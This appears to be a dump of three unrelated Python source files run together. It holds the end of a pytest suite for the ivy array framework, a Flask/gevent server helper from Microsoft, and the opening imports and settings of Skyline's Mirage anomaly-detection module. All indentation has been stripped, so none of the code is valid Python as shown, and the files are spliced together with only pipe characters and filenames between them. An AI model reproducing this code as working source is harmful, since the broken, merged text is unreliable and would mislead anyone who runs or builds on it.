# value test
if red == 'replace' and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
assert np.allclose(call(ivy.scatter_flat, inds, upd, size, tensor, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_flat(
ivy.to_numpy(inds), ivy.to_numpy(upd), size,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red)))
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape_tnsr_n_wdup",
[([[4], [3], [1], [7]], [9, 10, 11, 12], [8], None, False), ([[0, 1, 2]], [1], [3, 3, 3], None, False),
([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4], None, False),
([[0, 1, 2]], [1], None, [[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
[[4, 5, 6], [7, 8, 9], [1, 2, 3]],
[[7, 8, 9], [1, 2, 3], [4, 5, 6]]], False)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, shape, tensor, with_duplicates = inds_n_upd_n_shape_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_nd(inds, upd, shape, tensor, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
if shape:
assert tuple(ret.shape) == tuple(shape)
else:
assert tuple(ret.shape) == tuple(tensor.shape)
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates give non-deterministic outputs
return
ret = call(ivy.scatter_nd, inds, upd, shape, tensor, red, dev)
true = np.asarray(ivy.functional.backends.numpy.scatter_nd(
ivy.to_numpy(inds), ivy.to_numpy(upd), shape,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red))
assert np.allclose(ret, true)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather(prms, inds, axis, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(call(ivy.gather, prms, inds, axis, dev),
np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(prms), ivy.to_numpy(inds), axis)))
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather_nd(prms, inds, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1]:]
# value test
assert np.allclose(call(ivy.gather_nd, prms, inds, dev),
np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(prms), ivy.to_numpy(inds))))
# linear_resample
@pytest.mark.parametrize(
"x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
([[[10., 9.], [8., 7.]]], 5, -2,
[[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
([[[10., 9.], [8., 7.]]], 5, -1,
[[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
# smoke test
x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
x = tensor_fn(x, dtype, dev)
ret = ivy.linear_resample(x, samples, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = list(x.shape)
num_x_dims = len(x_shape)
axis = axis % num_x_dims
x_pre_shape = x_shape[0:axis]
num_vals = x.shape[axis]
x_post_shape = x_shape[axis+1:]
assert list(ret.shape) == x_pre_shape + [samples] + x_post_shape
# value test
y_true = np.array(y_true)
y = call(ivy.linear_resample, x, samples, axis)
assert np.allclose(y, y_true)
# exists
@pytest.mark.parametrize(
"x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
dv = tensor_fn(dv, dtype, dev)
ret = ivy.default(x, dv)
# type test
assert ivy.is_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
# dtype bits
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ivy.all_dtype_strs)
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_bits(x, dtype, tensor_fn, dev, call):
# smoke test
if ivy.invalid_dtype(dtype):
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype_bits(ivy.dtype(x))
# type test
assert isinstance(ret, int)
assert ret in [1, 8, 16, 32, 64]
# dtype_to_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dtype_as_str = ivy.dtype(x, as_str=True)
dtype_to_str = ivy.dtype_to_str(ivy.dtype(x))
# type test
assert isinstance(dtype_as_str, str)
assert isinstance(dtype_to_str, str)
# value test
assert dtype_to_str == dtype_as_str
# dtype_from_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dt0 = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
dt1 = ivy.dtype(x)
# value test
assert dt0 is dt1
def test_cache_fn(dev, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(dev, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly, the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# def test_framework_setting_with_threading(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# def thread_fn():
# ivy.set_framework('numpy')
# x_ = np.array([0., 1., 2.])
# for _ in range(2000):
# try:
# ivy.reduce_mean(x_)
# except TypeError:
# return False
# ivy.unset_framework()
# return True
#
# # get original framework string and array
# fws = ivy.current_framework_str()
# x = ivy.array([0., 1., 2.])
#
# # start numpy loop thread
# thread = threading.Thread(target=thread_fn)
# thread.start()
#
# # start local original framework loop
# ivy.set_framework(fws)
# for _ in range(2000):
# ivy.reduce_mean(x)
# ivy.unset_framework()
#
# assert not thread.join()
def test_framework_setting_with_multiprocessing(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(1000):
try:
ivy.reduce_mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_framework()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop thread
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(1000):
ivy.reduce_mean(x)
ivy.unset_framework()
worker.join()
assert output_queue.get_nowait()
# def test_explicit_ivy_framework_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# # store original framework string and unset
# fw_str = ivy.current_framework_str()
# ivy.unset_framework()
#
# # set with explicit handle caught
# ivy_exp = ivy.get_framework(fw_str)
# assert ivy_exp.current_framework_str() == fw_str
#
# # assert backend implemented function is accessible
# assert 'array' in ivy_exp.__dict__
# assert callable(ivy_exp.array)
#
# # assert joint implemented function is also accessible
# assert 'cache_fn' in ivy_exp.__dict__
# assert callable(ivy_exp.cache_fn)
#
# # set global ivy to numpy
# ivy.set_framework('numpy')
#
# # assert the explicit handle is still unchanged
# assert ivy.current_framework_str() == 'numpy'
# assert ivy_exp.current_framework_str() == fw_str
#
# # unset global ivy from numpy
# ivy.unset_framework()
# def test_class_ivy_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# class ArrayGen:
#
# def __init__(self, ivyh):
# self._ivy = ivyh
#
# def get_array(self):
# return self._ivy.array([0., 1., 2.])
#
# # create instance
# ag = ArrayGen(ivy.get_framework())
#
# # create array from array generator
# x = ag.get_array()
#
# # verify this is not a numpy array
# assert not isinstance(x, np.ndarray)
#
# # change global framework to numpy
# ivy.set_framework('numpy')
#
# # create another array from array generator
# x = ag.get_array()
#
# # verify this is not still a numpy array
# assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
[[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# profiler
# def test_profiler(dev, call):
#
# # ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
#
# # log dir
# this_dir = os.path.dirname(os.path.realpath(__file__))
# log_dir = os.path.join(this_dir, '../log')
#
# # with statement
# with ivy.Profiler(log_dir):
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
#
# # start and stop methods
# profiler = ivy.Profiler(log_dir)
# profiler.start()
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# profiler.stop()
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, 'keys')
assert hasattr(cont_type, 'values')
assert hasattr(cont_type, 'items')
def test_inplace_arrays_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch']:
assert ivy.inplace_arrays_supported()
elif cur_fw in ['jax', 'tensorflow']:
assert not ivy.inplace_arrays_supported()
else:
raise Exception('Unrecognized framework')
def test_inplace_variables_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch', 'tensorflow']:
assert ivy.inplace_variables_supported()
elif cur_fw in ['jax']:
assert not ivy.inplace_variables_supported()
else:
raise Exception('Unrecognized framework')
# @pytest.mark.parametrize(
# "x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_update(x_n_new, tensor_fn, dev, call):
# x_orig, new_val = x_n_new
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# new_val = tensor_fn(new_val, 'float32', dev)
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_update(x_orig, new_val)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_decrement(x_n_dec, tensor_fn, dev, call):
# x_orig, dec = x_n_dec
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# dec = tensor_fn(dec, 'float32', dev)
# new_val = x_orig - dec
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_decrement(x_orig, dec)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_increment(x_n_inc, tensor_fn, dev, call):
# x_orig, inc = x_n_inc
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# inc = tensor_fn(inc, 'float32', dev)
# new_val = x_orig + inc
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_increment(x_orig, inc)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
|
flask_helper.py
|
# Copyright (c) Microsoft Corporation
# Licensed under the MIT License.
from flask import Flask
from .environment_detector import build_environment
from .environments.credentialed_vm_environment import CREDENTIALED_VM
from .environments.public_vm_environment import PUBLIC_VM
import socket
import threading
import atexit
import uuid
import time
from gevent.pywsgi import WSGIServer
import logging
LOCALHOST = 'localhost'
VM_ENVS = {CREDENTIALED_VM, PUBLIC_VM}
class FlaskHelper(object):
"""FlaskHelper is a class for common Flask utilities used in dashboards."""
def __init__(self, ip=None, port=None, with_credentials=False):
# The name passed to Flask needs to be unique per instance.
self.app = Flask(uuid.uuid4().hex)
self.port = port
self.ip = ip
self.with_credentials = with_credentials
# dictionary to store arbitrary state for use by consuming classes
self.shared_state = {}
if self.ip is None:
self.ip = "localhost"
if self.port is None:
# Try 100 different ports
available = False
for port in range(5000, 5100):
available = FlaskHelper._is_local_port_available(
self.ip, port, raise_error=False)
if available:
self.port = port
break
if not available:
error_message = """Ports 5000 to 5100 not available.
Please specify an open port for use via the 'port'
parameter"""
raise RuntimeError(
error_message.format(port)
)
else:
FlaskHelper._is_local_port_available(self.ip, self.port,
raise_error=True)
self.env = build_environment(self)
if self.env.base_url is None:
return
# Sleep for 1 second in order to prevent random errors while
# socket is still closing
time.sleep(1)
self._thread = threading.Thread(target=self.run, daemon=True)
self._thread.start()
@staticmethod
def _is_local_port_available(ip, port, raise_error=True):
"""Check whether the specified local port is available.
Borrowed from:
https://stackoverflow.com/questions/19196105/how-to-check-if-a-network-port-is-open-on-linux
"""
try:
backlog = 5
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
# See stack overflow to prevent "Only one usage" random
# errors in tests:
# https://stackoverflow.com/questions/30420512/python-socket-error-only-one-usage-of-each-socket-address-is-normally-permitted
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
sock.bind((LOCALHOST, port))
sock.listen(backlog)
except (socket.error, OSError): # pragma: no cover
if raise_error:
error_message = """Port {0} is not available.
Please specify another port for use via the 'port' parameter"""
raise RuntimeError(
error_message.format(port)
)
else:
return False
return True
def run(self):
ip = LOCALHOST
# Note: for credentialed or public VM use the private IP address
if self.env_name in VM_ENVS:
host_name = socket.gethostname()
ip = socket.gethostbyname(host_name)
logger = logging.getLogger('wsgiserver')
logger.setLevel(logging.ERROR)
self.server = WSGIServer((ip, self.port), self.app, log=logger)
self.app.config["server"] = self.server
# self.app.config["CACHE_TYPE"] = "null"
self.server.serve_forever()
# Closes server on program exit, including freeing all sockets
def closeserver():
self.stop()
atexit.register(closeserver)
def stop(self):
if(self.server.started):
self.server.stop()
|
mirage.py
|
import logging
try:
from Queue import Empty
except:
from queue import Empty
# from redis import StrictRedis
from time import time, sleep
from threading import Thread
from collections import defaultdict
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets in place of Manager().list() to reduce memory and number of
# processes
# from multiprocessing import Process, Manager, Queue
from multiprocessing import Process, Queue
from msgpack import packb
from os import kill, getpid
import traceback
import re
# imports required for surfacing graphite JSON formatted timeseries for use in
# Mirage
import json
import sys
import requests
try:
import urlparse
except ImportError:
# @modified 20191113 - Branch #3262: py3
# import urllib.parse
import urllib.parse as urlparse
import os
# import errno
# import imp
from os import listdir
import datetime
import os.path
import resource
from shutil import rmtree
from ast import literal_eval
import settings
# @modified 20160922 - Branch #922: Ionosphere
# Added the send_anomalous_metric_to skyline_functions.py
from skyline_functions import (
write_data_to_file, fail_check, send_anomalous_metric_to,
mkdir_p, send_graphite_metric, filesafe_metricname,
# @added 20170603 - Feature #2034: analyse_derivatives
nonNegativeDerivative, in_list,
# @added 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# Added a single functions to deal with Redis connection and the
# charset='utf-8', decode_responses=True arguments required in py3
get_redis_conn, get_redis_conn_decoded,
# @added 20201009 - Feature #3780: skyline_functions - sanitise_graphite_url
# Bug #3778: Handle single encoded forward slash requests to Graphite
sanitise_graphite_url,
# @added 20201013 - Feature #3780: skyline_functions - sanitise_graphite_url
encode_graphite_metric_name)
# @added 20200425 - Feature #3512: matched_or_regexed_in_list function
# Feature #3508: ionosphere.untrainable_metrics
# Feature #3486: analyzer_batch
from matched_or_regexed_in_list import matched_or_regexed_in_list
from mirage_alerters import trigger_alert
from negaters import trigger_negater
from mirage_algorithms import run_selected_algorithm
from algorithm_exceptions import TooShort, Stale, Boring
from os.path import join, isfile
"""
ENABLE_MEMORY_PROFILING - DEVELOPMENT ONLY
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# Added all the memory profiling blocks - mem_top, pympler, objgraph, gc
Garbage collection et al, should not be run in anything but development model,
therefore these variables are hard coded and not accessible via settings.py,
if you are in here reading this then knock yourself out. gc and dump_garbage
can be useful for getting an idea about what all the objects in play are, but
garbage collection will just take longer and longer to run.
"""
LOCAL_DEBUG = False
ENABLE_MEMORY_PROFILING = False
garbage_collection_enabled = False
if ENABLE_MEMORY_PROFILING:
# @added 20160806 - Bug #1558: Memory leak in Analyzer
# As per http://stackoverflow.com/a/1641280
# This got useable understandable data
if garbage_collection_enabled:
from gc import get_objects
# Debug with garbage collection - http://code.activestate.com/recipes/65333/
import gc
skyline_app = 'mirage'
skyline_app_logger = '%sLog' % skyline_app
logger = logging.getLogger(skyline_app_logger)
skyline_app_logfile = '%s/%s.log' % (settings.LOG_PATH, skyline_app)
skyline_app_loglock = '%s.lock' % skyline_app_logfile
skyline_app_logwait = '%s.wait' % skyline_app_logfile
python_version = int(sys.version_info[0])
this_host = str(os.uname()[1])
try:
SERVER_METRIC_PATH = '.%s' % settings.SERVER_METRICS_NAME
if SERVER_METRIC_PATH == '.':
SERVER_METRIC_PATH = ''
except:
SERVER_METRIC_PATH = ''
try:
MIRAGE_PERIODIC_CHECK = settings.MIRAGE_PERIODIC_CHECK
except:
MIRAGE_PERIODIC_CHECK = False
# @added 20200413 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
try:
from settings import BATCH_PROCESSING
except:
BATCH_PROCESSING = None
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
BATCH_PROCESSING_NAMESPACES = list(settings.BATCH_PROCESSING_NAMESPACES)
except:
BATCH_PROCESSING_NAMESPACES = []
# @added 20200425 - Feature #3508: ionosphere.untrainable_metrics
# Determine if any metrcs have negatives values some they can be
# added to the ionosphere.untrainable_metrics Redis set
try:
# @modified 20200606 - Bug #3572: Apply list to settings import
# from settings import KNOWN_NEGATIVE_METRICS
KNOWN_NEGATIVE_METRICS = list(settings.KNOWN_NEGATIVE_METRICS)
except:
KNOWN_NEGATIVE_METRICS = []
# @added 20200604 - Mirage - populate_redis
try:
from settings import MIRAGE_AUTOFILL_TOOSHORT
except:
MIRAGE_AUTOFILL_TOOSHORT = False
# @added 20200607 - Feature #3566: custom_algorithms
try:
CUSTOM_ALGORITHMS = settings.CUSTOM_ALGORITHMS
except:
CUSTOM_ALGORITHMS = None
try:
DEBUG_CUSTOM_ALGORITHMS = settings.DEBUG_CUSTOM_ALGORITHMS
except:
DEBUG_CUSTOM_ALGORITHMS = False
# @added 20200723 - Feature #3472: ionosphere.training_data Redis set
# Feature #3566: custom_algorithms
try:
MIRAGE_ALWAYS_METRICS = list(settings.MIRAGE_ALWAYS_METRICS)
except:
MIRAGE_ALWAYS_METRICS = []
# @added 20200610 - Feature #3560: External alert config
try:
EXTERNAL_ALERTS = settings.EXTERNAL_ALERTS
except:
EXTERNAL_ALERTS = {}
if EXTERNAL_ALERTS:
from external_alert_configs import get_external_alert_configs
# @added 20200913 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
# Info #1792: Shapelet extraction
try:
SNAB_ENABLED = settings.SNAB_ENABLED
except:
SNAB_ENABLED = False
try:
SNAB_CHECKS = settings.SNAB_CHECKS.copy()
except:
SNAB_CHECKS = {}
# @added 20200916 - Branch #3068: SNAB
# Task #3744: POC matrixprofile
mirage_snab_only_checks_redis_set = 'mirage.snab_only_checks'
# @added 20201026 - Task #3800: Handle feedback metrics in Mirage and waterfall alerts
# Handle feedback metrics in a similar style to Ionosphere
try:
SKYLINE_FEEDBACK_NAMESPACES = list(settings.SKYLINE_FEEDBACK_NAMESPACES)
except:
# Let us take a guess
try:
graphite_host = str(settings.GRAPHITE_HOST)
graphite_hostname = graphite_host.split('.', -1)[0]
SKYLINE_FEEDBACK_NAMESPACES = [settings.SERVER_METRICS_NAME, graphite_hostname]
except:
SKYLINE_FEEDBACK_NAMESPACES = [this_host]
# @added 20201208 - Feature #3866: MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
# Task #3868: POC MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
try:
MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS = settings.MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS
except:
MIRAGE_ENABLE_HIGH_RESOLUTION_ANALYSIS = False
# @added 20210323 - Feature #3642: Anomaly type classification
try:
LUMINOSITY_CLASSIFY_ANOMALIES = settings.LUMINOSITY_CLASSIFY_ANOMALIES
except:
LUMINOSITY_CLASSIFY_ANOMALIES = False
skyline_app_graphite_namespace = 'skyline.%s%s' % (skyline_app, SERVER_METRIC_PATH)
failed_checks_dir = '%s_failed' % settings.MIRAGE_CHECK_PATH
# @added 20191107 - Branch #3262: py3
alert_test_file = '%s/%s_alert_test.txt' % (settings.SKYLINE_TMP_DIR, skyline_app)
class Mirage(Thread):
def __init__(self, parent_pid):
"""
Initialize the Mirage
"""
super(Mirage, self).__init__()
self.daemon = True
self.parent_pid = parent_pid
self.current_pid = getpid()
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Task #3032: Debug number of Python processes and memory use
# Branch #3002: docker
